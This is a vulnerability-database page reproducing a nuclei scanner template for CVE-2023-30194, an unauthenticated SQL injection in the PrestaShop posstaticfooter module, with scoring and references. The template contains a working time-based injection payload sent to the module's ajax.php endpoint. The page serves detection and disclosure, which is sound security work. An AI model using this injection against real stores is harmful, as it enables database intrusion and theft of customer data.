Lucene search
K

Prestashop posstaticfooter <= 1.0.0 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Prestashop posstaticfooter up to version 1.0.0 is vulnerable to SQL Injection via posstaticfooter::getPosCurrentHook.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-30194
23 Jul 202521:02
circl
CNNVD
Prestashop poststaticfooter SQL注入漏洞
10 May 202300:00
cnnvd
CVE
CVE-2023-30194
10 May 202300:00
cve
Cvelist
CVE-2023-30194
10 May 202300:00
cvelist
EUVD
EUVD-2023-34619
3 Oct 202520:07
euvd
NVD
CVE-2023-30194
10 May 202320:15
nvd
OSV
CVE-2023-30194
10 May 202320:15
osv
Prion
Sql injection
10 May 202320:15
prion
Positive Technologies
PT-2023-22576
10 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-30194
23 May 202503:42
redhatcve
Rows per page
id: CVE-2023-30194

info:
  name: Prestashop posstaticfooter <= 1.0.0 - SQL Injection
  author: daffainfo
  severity: critical
  description: |
    Prestashop posstaticfooter <= 1.0.0 is vulnerable to SQL Injection via posstaticfooter::getPosCurrentHook().
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to extract database contents including customer data, orders, payment information, and administrative credentials from the PrestaShop database.
  remediation: |
    Upgrade to the latest version of the posstaticfooter module from posthemes.
  reference:
    - https://friends-of-presta.github.io/security-advisories/modules/2023/05/09/posstaticfooter.html
    - https://themeforest.net/user/posthemes/portfolio
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30194
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-30194
    epss-score: 0.32413
    epss-percentile: 0.98123
    cwe-id: CWE-89
    cpe: cpe:2.3:a:prestashop:poststaticfooter:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: prestashop
    product: poststaticfooter
    shodan-query: html:"posstaticfooter"
  tags: cve,cve2023,prestashop,poststaticfooter,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - 'prestashop'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /modules/posstaticfooter/ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        module_id=1%22;select(0x73656C65637420736C6565702836293B)INTO@a;prepare`b`from@a;execute`b`;--

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - contains(body, '\"[]\"')
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100de68ab473077f78870eb5fb26cba3eeb39c6f03554cf2caa7dd29ffcfa82962f022100e02203597a9ed2ab11abff74004fae56c18b28f400d88baaa70a98b79d0043d7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.32413
SSVC
16